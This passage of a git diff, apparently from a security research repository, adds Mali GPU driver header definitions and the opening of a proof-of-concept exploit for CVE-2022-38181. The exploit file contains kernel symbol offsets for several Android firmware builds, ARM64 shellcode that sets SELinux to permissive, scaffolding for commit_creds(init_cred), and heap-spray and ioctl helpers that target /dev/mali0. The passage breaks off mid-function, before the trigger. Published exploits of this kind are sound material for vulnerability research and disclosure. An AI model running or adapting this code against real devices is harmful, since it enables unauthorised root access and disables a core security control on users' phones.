+ * In UK 10.3 a core_req field of a __u32 type was added to the end of the
+ * structure, and the place in the structure previously occupied by __u16
+ * core_req was kept but renamed to compat_core_req.
+ *
+ * From UK 11.20 - compat_core_req is now occupied by __u8 jit_id[2].
+ * Compatibility with UK 10.x from UK 11.y is not handled because
+ * the major version increase prevents this.
+ *
+ * For UK 11.20 jit_id[2] must be initialized to zero.
+ */
+struct base_jd_atom_v2 {
+ __u64 jc;
+ struct base_jd_udata udata;
+ __u64 extres_list;
+ __u16 nr_extres;
+ __u8 jit_id[2];
+ struct base_dependency pre_dep[2];
+ base_atom_id atom_number;
+ base_jd_prio prio;
+ __u8 device_nr;
+ __u8 jobslot;
+ base_jd_core_req core_req;
+ __u8 renderpass_id;
+ __u8 padding[7];
+};
+
+/**
+ * struct base_jd_atom - Same as base_jd_atom_v2, but has an extra seq_nr
+ * at the beginning.
+ *
+ * @seq_nr: Sequence number of logical grouping of atoms.
+ * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS
+ * is set in the base_jd_core_req) the CPU address of a
+ * base_jd_fragment object.
+ * @udata: User data.
+ * @extres_list: List of external resources.
+ * @nr_extres: Number of external resources or JIT allocations.
+ * @jit_id: Zero-terminated array of IDs of just-in-time memory
+ * allocations written to by the atom. When the atom
+ * completes, the value stored at the
+ * &struct_base_jit_alloc_info.heap_info_gpu_addr of
+ * each allocation is read in order to enforce an
+ * overall physical memory usage limit.
+ * @pre_dep: Pre-dependencies. One need to use SETTER function to assign
+ * this field; this is done in order to reduce possibility of
+ * improper assignment of a dependency field.
+ * @atom_number: Unique number to identify the atom.
+ * @prio: Atom priority. Refer to base_jd_prio for more details.
+ * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP
+ * specified.
+ * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified.
+ * @core_req: Core requirements.
+ * @renderpass_id: Renderpass identifier used to associate an atom that has
+ * BASE_JD_REQ_START_RENDERPASS set in its core requirements
+ * with an atom that has BASE_JD_REQ_END_RENDERPASS set.
+ * @padding: Unused. Must be zero.
+ */
+typedef struct base_jd_atom {
+ __u64 seq_nr;
+ __u64 jc;
+ struct base_jd_udata udata;
+ __u64 extres_list;
+ __u16 nr_extres;
+ __u8 jit_id[2];
+ struct base_dependency pre_dep[2];
+ base_atom_id atom_number;
+ base_jd_prio prio;
+ __u8 device_nr;
+ __u8 jobslot;
+ base_jd_core_req core_req;
+ __u8 renderpass_id;
+ __u8 padding[7];
+} base_jd_atom;
+
+struct base_jit_alloc_info {
+ __u64 gpu_alloc_addr;
+ __u64 va_pages;
+ __u64 commit_pages;
+ __u64 extension;
+ __u8 id;
+ __u8 bin_id;
+ __u8 max_allocations;
+ __u8 flags;
+ __u8 padding[2];
+ __u16 usage_id;
+ __u64 heap_info_gpu_addr;
+};
+
+/* Job chain event code bits
+ * Defines the bits used to create ::base_jd_event_code
+ */
+enum {
+ BASE_JD_SW_EVENT_KERNEL = (1u << 15), /* Kernel side event */
+ BASE_JD_SW_EVENT = (1u << 14), /* SW defined event */
+ /* Event indicates success (SW events only) */
+ BASE_JD_SW_EVENT_SUCCESS = (1u << 13),
+ BASE_JD_SW_EVENT_JOB = (0u << 11), /* Job related event */
+ BASE_JD_SW_EVENT_BAG = (1u << 11), /* Bag related event */
+ BASE_JD_SW_EVENT_INFO = (2u << 11), /* Misc/info event */
+ BASE_JD_SW_EVENT_RESERVED = (3u << 11), /* Reserved event type */
+ /* Mask to extract the type from an event code */
+ BASE_JD_SW_EVENT_TYPE_MASK = (3u << 11)
+};
+
+/**
+ * enum base_jd_event_code - Job chain event codes
+ *
+ * @BASE_JD_EVENT_RANGE_HW_NONFAULT_START: Start of hardware non-fault status
+ * codes.
+ * Obscurely, BASE_JD_EVENT_TERMINATED
+ * indicates a real fault, because the
+ * job was hard-stopped.
+ * @BASE_JD_EVENT_NOT_STARTED: Can't be seen by userspace, treated as
+ * 'previous job done'.
+ * @BASE_JD_EVENT_STOPPED: Can't be seen by userspace, becomes
+ * TERMINATED, DONE or JOB_CANCELLED.
+ * @BASE_JD_EVENT_TERMINATED: This is actually a fault status code - the job
+ * was hard stopped.
+ * @BASE_JD_EVENT_ACTIVE: Can't be seen by userspace, jobs only returned on
+ * complete/fail/cancel.
+ * @BASE_JD_EVENT_RANGE_HW_NONFAULT_END: End of hardware non-fault status codes.
+ * Obscurely, BASE_JD_EVENT_TERMINATED
+ * indicates a real fault,
+ * because the job was hard-stopped.
+ * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START: Start of hardware fault and
+ * software error status codes.
+ * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END: End of hardware fault and
+ * software error status codes.
+ * @BASE_JD_EVENT_RANGE_SW_SUCCESS_START: Start of software success status
+ * codes.
+ * @BASE_JD_EVENT_RANGE_SW_SUCCESS_END: End of software success status codes.
+ * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_START: Start of kernel-only status codes.
+ * Such codes are never returned to
+ * user-space.
+ * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_END: End of kernel-only status codes.
+ * @BASE_JD_EVENT_DONE: atom has completed successfull
+ * @BASE_JD_EVENT_JOB_CONFIG_FAULT: Atom dependencies configuration error which
+ * shall result in a failed atom
+ * @BASE_JD_EVENT_JOB_POWER_FAULT: The job could not be executed because the
+ * part of the memory system required to access
+ * job descriptors was not powered on
+ * @BASE_JD_EVENT_JOB_READ_FAULT: Reading a job descriptor into the Job
+ * manager failed
+ * @BASE_JD_EVENT_JOB_WRITE_FAULT: Writing a job descriptor from the Job
+ * manager failed
+ * @BASE_JD_EVENT_JOB_AFFINITY_FAULT: The job could not be executed because the
+ * specified affinity mask does not intersect
+ * any available cores
+ * @BASE_JD_EVENT_JOB_BUS_FAULT: A bus access failed while executing a job
+ * @BASE_JD_EVENT_INSTR_INVALID_PC: A shader instruction with an illegal program
+ * counter was executed.
+ * @BASE_JD_EVENT_INSTR_INVALID_ENC: A shader instruction with an illegal
+ * encoding was executed.
+ * @BASE_JD_EVENT_INSTR_TYPE_MISMATCH: A shader instruction was executed where
+ * the instruction encoding did not match the
+ * instruction type encoded in the program
+ * counter.
+ * @BASE_JD_EVENT_INSTR_OPERAND_FAULT: A shader instruction was executed that
+ * contained invalid combinations of operands.
+ * @BASE_JD_EVENT_INSTR_TLS_FAULT: A shader instruction was executed that tried
+ * to access the thread local storage section
+ * of another thread.
+ * @BASE_JD_EVENT_INSTR_ALIGN_FAULT: A shader instruction was executed that
+ * tried to do an unsupported unaligned memory
+ * access.
+ * @BASE_JD_EVENT_INSTR_BARRIER_FAULT: A shader instruction was executed that
+ * failed to complete an instruction barrier.
+ * @BASE_JD_EVENT_DATA_INVALID_FAULT: Any data structure read as part of the job
+ * contains invalid combinations of data.
+ * @BASE_JD_EVENT_TILE_RANGE_FAULT: Tile or fragment shading was asked to
+ * process a tile that is entirely outside the
+ * bounding box of the frame.
+ * @BASE_JD_EVENT_STATE_FAULT: Matches ADDR_RANGE_FAULT. A virtual address
+ * has been found that exceeds the virtual
+ * address range.
+ * @BASE_JD_EVENT_OUT_OF_MEMORY: The tiler ran out of memory when executing a job.
+ * @BASE_JD_EVENT_UNKNOWN: If multiple jobs in a job chain fail, only
+ * the first one the reports an error will set
+ * and return full error information.
+ * Subsequent failing jobs will not update the
+ * error status registers, and may write an
+ * error status of UNKNOWN.
+ * @BASE_JD_EVENT_DELAYED_BUS_FAULT: The GPU received a bus fault for access to
+ * physical memory where the original virtual
+ * address is no longer available.
+ * @BASE_JD_EVENT_SHAREABILITY_FAULT: Matches GPU_SHAREABILITY_FAULT. A cache
+ * has detected that the same line has been
+ * accessed as both shareable and non-shareable
+ * memory from inside the GPU.
+ * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1: A memory access hit an invalid table
+ * entry at level 1 of the translation table.
+ * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2: A memory access hit an invalid table
+ * entry at level 2 of the translation table.
+ * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3: A memory access hit an invalid table
+ * entry at level 3 of the translation table.
+ * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4: A memory access hit an invalid table
+ * entry at level 4 of the translation table.
+ * @BASE_JD_EVENT_PERMISSION_FAULT: A memory access could not be allowed due to
+ * the permission flags set in translation
+ * table
+ * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1: A bus fault occurred while reading
+ * level 0 of the translation tables.
+ * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2: A bus fault occurred while reading
+ * level 1 of the translation tables.
+ * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3: A bus fault occurred while reading
+ * level 2 of the translation tables.
+ * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4: A bus fault occurred while reading
+ * level 3 of the translation tables.
+ * @BASE_JD_EVENT_ACCESS_FLAG: Matches ACCESS_FLAG_0. A memory access hit a
+ * translation table entry with the ACCESS_FLAG
+ * bit set to zero in level 0 of the
+ * page table, and the DISABLE_AF_FAULT flag
+ * was not set.
+ * @BASE_JD_EVENT_MEM_GROWTH_FAILED: raised for JIT_ALLOC atoms that failed to
+ * grow memory on demand
+ * @BASE_JD_EVENT_JOB_CANCELLED: raised when this atom was hard-stopped or its
+ * dependencies failed
+ * @BASE_JD_EVENT_JOB_INVALID: raised for many reasons, including invalid data
+ * in the atom which overlaps with
+ * BASE_JD_EVENT_JOB_CONFIG_FAULT, or if the
+ * platform doesn't support the feature specified in
+ * the atom.
+ * @BASE_JD_EVENT_PM_EVENT: TODO: remove as it's not used
+ * @BASE_JD_EVENT_TIMED_OUT: TODO: remove as it's not used
+ * @BASE_JD_EVENT_BAG_INVALID: TODO: remove as it's not used
+ * @BASE_JD_EVENT_PROGRESS_REPORT: TODO: remove as it's not used
+ * @BASE_JD_EVENT_BAG_DONE: TODO: remove as it's not used
+ * @BASE_JD_EVENT_DRV_TERMINATED: this is a special event generated to indicate
+ * to userspace that the KBase context has been
+ * destroyed and Base should stop listening for
+ * further events
+ * @BASE_JD_EVENT_REMOVED_FROM_NEXT: raised when an atom that was configured in
+ * the GPU has to be retried (but it has not
+ * started) due to e.g., GPU reset
+ * @BASE_JD_EVENT_END_RP_DONE: this is used for incremental rendering to signal
+ * the completion of a renderpass. This value
+ * shouldn't be returned to userspace but I haven't
+ * seen where it is reset back to JD_EVENT_DONE.
+ *
+ * HW and low-level SW events are represented by event codes.
+ * The status of jobs which succeeded are also represented by
+ * an event code (see @BASE_JD_EVENT_DONE).
+ * Events are usually reported as part of a &struct base_jd_event.
+ *
+ * The event codes are encoded in the following way:
+ * * 10:0 - subtype
+ * * 12:11 - type
+ * * 13 - SW success (only valid if the SW bit is set)
+ * * 14 - SW event (HW event if not set)
+ * * 15 - Kernel event (should never be seen in userspace)
+ *
+ * Events are split up into ranges as follows:
+ * * BASE_JD_EVENT_RANGE__START
+ * * BASE_JD_EVENT_RANGE__END
+ *
+ * code is in 's range when:
+ * BASE_JD_EVENT_RANGE__START <= code <
+ * BASE_JD_EVENT_RANGE__END
+ *
+ * Ranges can be asserted for adjacency by testing that the END of the previous
+ * is equal to the START of the next. This is useful for optimizing some tests
+ * for range.
+ *
+ * A limitation is that the last member of this enum must explicitly be handled
+ * (with an assert-unreachable statement) in switch statements that use
+ * variables of this type. Otherwise, the compiler warns that we have not
+ * handled that enum value.
+ */
+enum base_jd_event_code {
+ /* HW defined exceptions */
+ BASE_JD_EVENT_RANGE_HW_NONFAULT_START = 0,
+
+ /* non-fatal exceptions */
+ BASE_JD_EVENT_NOT_STARTED = 0x00,
+ BASE_JD_EVENT_DONE = 0x01,
+ BASE_JD_EVENT_STOPPED = 0x03,
+ BASE_JD_EVENT_TERMINATED = 0x04,
+ BASE_JD_EVENT_ACTIVE = 0x08,
+
+ BASE_JD_EVENT_RANGE_HW_NONFAULT_END = 0x40,
+ BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START = 0x40,
+
+ /* job exceptions */
+ BASE_JD_EVENT_JOB_CONFIG_FAULT = 0x40,
+ BASE_JD_EVENT_JOB_POWER_FAULT = 0x41,
+ BASE_JD_EVENT_JOB_READ_FAULT = 0x42,
+ BASE_JD_EVENT_JOB_WRITE_FAULT = 0x43,
+ BASE_JD_EVENT_JOB_AFFINITY_FAULT = 0x44,
+ BASE_JD_EVENT_JOB_BUS_FAULT = 0x48,
+ BASE_JD_EVENT_INSTR_INVALID_PC = 0x50,
+ BASE_JD_EVENT_INSTR_INVALID_ENC = 0x51,
+ BASE_JD_EVENT_INSTR_TYPE_MISMATCH = 0x52,
+ BASE_JD_EVENT_INSTR_OPERAND_FAULT = 0x53,
+ BASE_JD_EVENT_INSTR_TLS_FAULT = 0x54,
+ BASE_JD_EVENT_INSTR_BARRIER_FAULT = 0x55,
+ BASE_JD_EVENT_INSTR_ALIGN_FAULT = 0x56,
+ BASE_JD_EVENT_DATA_INVALID_FAULT = 0x58,
+ BASE_JD_EVENT_TILE_RANGE_FAULT = 0x59,
+ BASE_JD_EVENT_STATE_FAULT = 0x5A,
+ BASE_JD_EVENT_OUT_OF_MEMORY = 0x60,
+ BASE_JD_EVENT_UNKNOWN = 0x7F,
+
+ /* GPU exceptions */
+ BASE_JD_EVENT_DELAYED_BUS_FAULT = 0x80,
+ BASE_JD_EVENT_SHAREABILITY_FAULT = 0x88,
+
+ /* MMU exceptions */
+ BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1 = 0xC1,
+ BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2 = 0xC2,
+ BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3 = 0xC3,
+ BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4 = 0xC4,
+ BASE_JD_EVENT_PERMISSION_FAULT = 0xC8,
+ BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1 = 0xD1,
+ BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2 = 0xD2,
+ BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3 = 0xD3,
+ BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4 = 0xD4,
+ BASE_JD_EVENT_ACCESS_FLAG = 0xD8,
+
+ /* SW defined exceptions */
+ BASE_JD_EVENT_MEM_GROWTH_FAILED =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x000,
+ BASE_JD_EVENT_TIMED_OUT =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x001,
+ BASE_JD_EVENT_JOB_CANCELLED =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x002,
+ BASE_JD_EVENT_JOB_INVALID =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x003,
+ BASE_JD_EVENT_PM_EVENT =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x004,
+
+ BASE_JD_EVENT_BAG_INVALID =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_BAG | 0x003,
+
+ BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_RESERVED | 0x3FF,
+
+ BASE_JD_EVENT_RANGE_SW_SUCCESS_START = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_SUCCESS | 0x000,
+
+ BASE_JD_EVENT_PROGRESS_REPORT = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_JOB | 0x000,
+ BASE_JD_EVENT_BAG_DONE = BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_SUCCESS |
+ BASE_JD_SW_EVENT_BAG | 0x000,
+ BASE_JD_EVENT_DRV_TERMINATED = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_INFO | 0x000,
+
+ BASE_JD_EVENT_RANGE_SW_SUCCESS_END = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_RESERVED | 0x3FF,
+
+ BASE_JD_EVENT_RANGE_KERNEL_ONLY_START = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_KERNEL | 0x000,
+ BASE_JD_EVENT_REMOVED_FROM_NEXT = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x000,
+ BASE_JD_EVENT_END_RP_DONE = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x001,
+
+ BASE_JD_EVENT_RANGE_KERNEL_ONLY_END = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_RESERVED | 0x3FF
+};
+
+/**
+ * struct base_jd_event_v2 - Event reporting structure
+ *
+ * @event_code: event code.
+ * @atom_number: the atom number that has completed.
+ * @udata: user data.
+ *
+ * This structure is used by the kernel driver to report information
+ * about GPU events. They can either be HW-specific events or low-level
+ * SW events, such as job-chain completion.
+ *
+ * The event code contains an event type field which can be extracted
+ * by ANDing with BASE_JD_SW_EVENT_TYPE_MASK.
+ */
+struct base_jd_event_v2 {
+ enum base_jd_event_code event_code;
+ base_atom_id atom_number;
+ struct base_jd_udata udata;
+};
+
+/**
+ * struct base_dump_cpu_gpu_counters - Structure for
+ * BASE_JD_REQ_SOFT_DUMP_CPU_GPU_COUNTERS
+ * jobs.
+ * @system_time: gpu timestamp
+ * @cycle_counter: gpu cycle count
+ * @sec: cpu time(sec)
+ * @usec: cpu time(usec)
+ * @padding: padding
+ *
+ * This structure is stored into the memory pointed to by the @jc field
+ * of &struct base_jd_atom.
+ *
+ * It must not occupy the same CPU cache line(s) as any neighboring data.
+ * This is to avoid cases where access to pages containing the structure
+ * is shared between cached and un-cached memory regions, which would
+ * cause memory corruption.
+ */
+
+struct base_dump_cpu_gpu_counters {
+ __u64 system_time;
+ __u64 cycle_counter;
+ __u64 sec;
+ __u32 usec;
+ __u8 padding[36];
+};
+
+#endif /* _UAPI_BASE_JM_KERNEL_H_ */
+
diff --git a/SecurityExploits/Android/Mali/CVE_2022_38181/mali_shrinker_mmap.c b/SecurityExploits/Android/Mali/CVE_2022_38181/mali_shrinker_mmap.c
new file mode 100644
index 0000000..5cf4aef
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_38181/mali_shrinker_mmap.c
@@ -0,0 +1,796 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include "stdbool.h"
+#include
+#include
+
+#include "mali.h"
+#include "mali_base_jm_kernel.h"
+#include "midgard.h"
+
+#ifdef SHELL
+#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__)
+#else
+#include
+#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__)
+
+#endif //SHELL
+
+#define MALI "/dev/mali0"
+
+#define PAGE_SHIFT 12
+
+#define BASE_MEM_ALIAS_MAX_ENTS ((size_t)24576)
+
+#define PFN_DOWN(x) ((x) >> PAGE_SHIFT)
+
+#define SPRAY_PAGES 25
+
+#define SPRAY_NUM 64
+
+#define FLUSH_SIZE (0x1000 * 0x1000)
+
+#define SPRAY_CPU 0
+
+#define POOL_SIZE 16384
+
+#define RESERVED_SIZE 32
+
+#define TOTAL_RESERVED_SIZE 1024
+
+#define FLUSH_REGION_SIZE 500
+
+#define NUM_TRIALS 100
+
+#define KERNEL_BASE 0x80000000
+
+#define OVERWRITE_INDEX 256
+
+#define ADRP_INIT_INDEX 0
+
+#define ADD_INIT_INDEX 1
+
+#define ADRP_COMMIT_INDEX 2
+
+#define ADD_COMMIT_INDEX 3
+
+#define AVC_DENY_2108 0x92df1c
+
+#define SEL_READ_ENFORCE_2108 0x942ae4
+
+#define INIT_CRED_2108 0x29a0570
+
+#define COMMIT_CREDS_2108 0x180b0c
+
+#define ADD_INIT_2108 0x9115c000
+
+#define ADD_COMMIT_2108 0x912c3108
+
+#define AVC_DENY_2201 0x930af4
+
+#define SEL_READ_ENFORCE_2201 0x9456bc
+
+#define INIT_CRED_2201 0x29b0570
+
+#define COMMIT_CREDS_2201 0x183df0
+
+#define ADD_INIT_2201 0x9115c000
+
+#define ADD_COMMIT_2201 0x9137c108
+
+#define AVC_DENY_2202 0x930b50
+
+#define SEL_READ_ENFORCE_2202 0x94551c
+
+#define INIT_CRED_2202 0x29b0570
+
+#define COMMIT_CREDS_2202 0x183e3c
+
+#define ADD_INIT_2202 0x9115c000 //add x0, x0, #0x570
+
+#define ADD_COMMIT_2202 0x9138f108 //add x8, x8, #0xe3c
+
+#define AVC_DENY_2207 0x927664
+
+#define SEL_READ_ENFORCE_2207 0x93bf5c
+
+#define INIT_CRED_2207 0x29e07f0
+
+#define COMMIT_CREDS_2207 0x18629c
+
+#define ADD_INIT_2207 0x911fc000 //add x0, x0, #0x7f0
+
+#define ADD_COMMIT_2207 0x910a7108 //add x8, x8, #0x29c
+
+#define AVC_DENY_2211 0x8d6810
+
+#define SEL_READ_ENFORCE_2211 0x8ea124
+
+#define INIT_CRED_2211 0x2fd1388
+
+#define COMMIT_CREDS_2211 0x17ada4
+
+#define ADD_INIT_2211 0x910e2000 //add x0, x0, #0x388
+
+#define ADD_COMMIT_2211 0x91369108 //add x8, x8, #0xda4
+
+#define AVC_DENY_2212 0x8ba710
+
+#define SEL_READ_ENFORCE_2212 0x8cdfd4
+
+#define INIT_CRED_2212 0x2fd1418
+
+#define COMMIT_CREDS_2212 0x177ee4
+
+#define ADD_INIT_2212 0x91106000 //add x0, x0, #0x418
+
+#define ADD_COMMIT_2212 0x913b9108 //add x8, x8, #0xee4
+
+
+static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2207;
+
+static uint64_t avc_deny = AVC_DENY_2207;
+
+/*
+Overwriting SELinux to permissive
+ strb wzr, [x0]
+ mov x0, #0
+ ret
+*/
+static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0};
+
+static uint32_t root_code[8] = {0};
+
+static uint8_t jit_id = 1;
+static uint8_t atom_number = 1;
+static uint64_t gpu_va[SPRAY_NUM] = {0};
+static int gpu_va_idx = 0;
+static void* flush_regions[FLUSH_REGION_SIZE];
+static void* alias_regions[SPRAY_NUM] = {0};
+static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE];
+
+
+struct base_mem_handle {
+ struct {
+ __u64 handle;
+ } basep;
+};
+
+struct base_mem_aliasing_info {
+ struct base_mem_handle handle;
+ __u64 offset;
+ __u64 length;
+};
+
+static int open_dev(char* name) {
+ int fd = open(name, O_RDWR);
+ if (fd == -1) {
+ err(1, "cannot open %s\n", name);
+ }
+ return fd;
+}
+
+void setup_mali(int fd, int group_id) {
+ struct kbase_ioctl_version_check param = {0};
+ if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, ¶m) < 0) {
+ err(1, "version check failed\n");
+ }
+ struct kbase_ioctl_set_flags set_flags = {group_id << 3};
+ if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) {
+ err(1, "set flags failed\n");
+ }
+}
+
+void* setup_tracking_page(int fd) {
+ void* region = mmap(NULL, 0x1000, 0, MAP_SHARED, fd, BASE_MEM_MAP_TRACKING_HANDLE);
+ if (region == MAP_FAILED) {
+ err(1, "setup tracking page failed");
+ }
+ return region;
+}
+
+void jit_init(int fd, uint64_t va_pages, uint64_t trim_level, int group_id) {
+ struct kbase_ioctl_mem_jit_init init = {0};
+ init.va_pages = va_pages;
+ init.max_allocations = 255;
+ init.trim_level = trim_level;
+ init.group_id = group_id;
+ init.phys_pages = va_pages;
+
+ if (ioctl(fd, KBASE_IOCTL_MEM_JIT_INIT, &init) < 0) {
+ err(1, "jit init failed\n");
+ }
+}
+
+uint64_t jit_allocate(int fd, uint8_t atom_number, uint8_t id, uint64_t va_pages, uint64_t gpu_alloc_addr) {
+ struct base_jit_alloc_info info = {0};
+ struct base_jd_atom_v2 atom = {0};
+
+ info.id = id;
+ info.gpu_alloc_addr = gpu_alloc_addr;
+ info.va_pages = va_pages;
+ info.commit_pages = va_pages;
+ info.extension = 0x1000;
+
+ atom.jc = (uint64_t)(&info);
+ atom.atom_number = atom_number;
+ atom.core_req = BASE_JD_REQ_SOFT_JIT_ALLOC;
+ atom.nr_extres = 1;
+ struct kbase_ioctl_job_submit submit = {0};
+ submit.addr = (uint64_t)(&atom);
+ submit.nr_atoms = 1;
+ submit.stride = sizeof(struct base_jd_atom_v2);
+ if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
+ err(1, "submit job failed\n");
+ }
+ return *((uint64_t*)gpu_alloc_addr);
+}
+
+void jit_free(int fd, uint8_t atom_number, uint8_t id) {
+ uint8_t free_id = id;
+
+ struct base_jd_atom_v2 atom = {0};
+
+ atom.jc = (uint64_t)(&free_id);
+ atom.atom_number = atom_number;
+ atom.core_req = BASE_JD_REQ_SOFT_JIT_FREE;
+ atom.nr_extres = 1;
+ struct kbase_ioctl_job_submit submit = {0};
+ submit.addr = (uint64_t)(&atom);
+ submit.nr_atoms = 1;
+ submit.stride = sizeof(struct base_jd_atom_v2);
+ if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
+ err(1, "submit job failed\n");
+ }
+
+}
+
+void mem_flags_change(int fd, uint64_t gpu_addr, uint32_t flags, int ignore_results) {
+ struct kbase_ioctl_mem_flags_change change = {0};
+ change.flags = flags;
+ change.gpu_va = gpu_addr;
+ change.mask = flags;
+ if (ignore_results) {
+ ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change);
+ return;
+ }
+ if (ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change) < 0) {
+ err(1, "flags_change failed\n");
+ }
+}
+
+void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) {
+ if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) {
+ err(1, "mem_alloc failed\n");
+ }
+}
+
+void mem_alias(int fd, union kbase_ioctl_mem_alias* alias) {
+ if (ioctl(fd, KBASE_IOCTL_MEM_ALIAS, alias) < 0) {
+ err(1, "mem_alias failed\n");
+ }
+}
+
+void mem_query(int fd, union kbase_ioctl_mem_query* query) {
+ if (ioctl(fd, KBASE_IOCTL_MEM_QUERY, query) < 0) {
+ err(1, "mem_query failed\n");
+ }
+}
+
+void mem_commit(int fd, uint64_t gpu_addr, uint64_t pages) {
+ struct kbase_ioctl_mem_commit commit = {.gpu_addr = gpu_addr, pages = pages};
+ if (ioctl(fd, KBASE_IOCTL_MEM_COMMIT, &commit) < 0) {
+ err(1, "mem_commit failed\n");
+ }
+}
+
+void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22);
+ int prot = PROT_READ;
+ if (!read_only) {
+ alloc.in.flags |= BASE_MEM_PROT_GPU_WR;
+ prot |= PROT_WRITE;
+ }
+ alloc.in.va_pages = va_pages;
+ alloc.in.commit_pages = commit_pages;
+ mem_alloc(mali_fd, &alloc);
+ void* region = mmap(NULL, 0x1000 * va_pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va);
+ if (region == MAP_FAILED) {
+ err(1, "mmap failed");
+ }
+ return region;
+}
+
+uint64_t alloc_mem(int mali_fd, unsigned int pages) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR;
+ int prot = PROT_READ | PROT_WRITE;
+ alloc.in.va_pages = pages;
+ alloc.in.commit_pages = pages;
+ mem_alloc(mali_fd, &alloc);
+ return alloc.out.gpu_va;
+}
+
+void free_mem(int mali_fd, uint64_t gpuaddr) {
+ struct kbase_ioctl_mem_free mem_free = {.gpu_addr = gpuaddr};
+ if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) {
+ err(1, "free_mem failed\n");
+ }
+}
+
+uint64_t drain_mem_pool(int mali_fd) {
+ union kbase_ioctl_mem_alloc alloc = {0};
+ alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22);
+ int prot = PROT_READ | PROT_WRITE;
+ alloc.in.va_pages = POOL_SIZE;
+ alloc.in.commit_pages = POOL_SIZE;
+ mem_alloc(mali_fd, &alloc);
+ return alloc.out.gpu_va;
+}
+
+void release_mem_pool(int mali_fd, uint64_t drain) {
+ struct kbase_ioctl_mem_free mem_free = {.gpu_addr = drain};
+ if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) {
+ err(1, "free_mem failed\n");
+ }
+}
+
+#define CPU_SETSIZE 1024
+#define __NCPUBITS (8 * sizeof (unsigned long))
+typedef struct
+{
+ unsigned long __bits[CPU_SETSIZE / __NCPUBITS];
+} cpu_set_t;
+
+#define CPU_SET(cpu, cpusetp) \
+ ((cpusetp)->__bits[(cpu)/__NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS)))
+#define CPU_ZERO(cpusetp) \
+ memset((cpusetp), 0, sizeof(cpu_set_t))
+
+int migrate_to_cpu(int i)
+{
